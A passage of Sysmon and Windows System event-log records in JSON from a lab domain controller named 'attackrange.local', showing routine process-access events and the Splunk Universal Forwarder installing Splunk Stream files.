C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2803,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-020F-5F25-0000-001033E90400}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-020F-5F25-0000-001033E90400}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:22","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2804,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:22.343\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-0010556D0100}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:22.343","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-0010556D0100}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:22","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2805,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:22.343\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-0010556D0100}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:22.343","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-0010556D0100}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2806,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:36.884\r\nSourceProcessGUID: {A837DB8D-01BB-5F25-0000-00100E6D0200}\r\nSourceProcessId: 2968\r\nSourceThreadId: 2984\r\nSourceImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-0010C76E0200}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\System32\\combase.dll+669f8|C:\\Windows\\servicing\\TrustedInstaller.exe+43a2|C:\\Windows\\servicing\\TrustedInstaller.exe+1d1d|C:\\Windows\\servicing\\TrustedInstaller.exe+28c6|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:36.884","SourceProcessGUID":"{A837DB8D-01BB-5F25-0000-00100E6D0200}","SourceProcessId":"2968","SourceThreadId":"2984","SourceImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-0010C76E0200}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\System32\\combase.dll+669f8|C:\\Windows\\servicing\\TrustedInstaller.exe+43a2|C:\\Windows\\servicing\\TrustedInstaller.exe+1d1d|C:\\Windows\\servicing\\TrustedInstaller.exe+28c6|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76838,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The TrustedInstaller service entered the stopped state.","param1":"TrustedInstaller","param2":"stopped","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2807,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:48:38.041\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\Packet.dll\r\nCreationUtcTime: 2020-08-01 05:48:38.041","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:48:38.041","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\Packet.dll","CreationUtcTime":"2020-08-01 05:48:38.041","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2808,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:48:38.041\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\concrt140.dll\r\nCreationUtcTime: 2020-08-01 05:48:38.041","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:48:38.041","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\concrt140.dll","CreationUtcTime":"2020-08-01 05:48:38.041","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2809,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:48:38.041\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\msvcp140.dll\r\nCreationUtcTime: 2020-08-01 05:48:38.041","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:48:38.041","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\msvcp140.dll","CreationUtcTime":"2020-08-01 05:48:38.041","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2810,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.056\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys\r\nCreationUtcTime: 2020-08-01 05:48:38.056","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.056","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","CreationUtcTime":"2020-08-01 05:48:38.056","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2811,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:48:38.056\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmflow.dll\r\nCreationUtcTime: 2020-08-01 05:48:38.056","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:48:38.056","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmflow.dll","CreationUtcTime":"2020-08-01 05:48:38.056","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2812,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:48:38.056\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmframework.dll\r\nCreationUtcTime: 2020-08-01 05:48:38.056","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:48:38.056","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmframework.dll","CreationUtcTime":"2020-08-01 05:48:38.056","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2813,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:48:38.056\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmprotocols.dll\r\nCreationUtcTime: 2020-08-01 05:48:38.056","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:48:38.056","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmprotocols.dll","CreationUtcTime":"2020-08-01 05:48:38.056","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2814,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:48:38.072\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nCreationUtcTime: 2020-08-01 05:48:38.072","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:48:38.072","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","CreationUtcTime":"2020-08-01 05:48:38.072","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
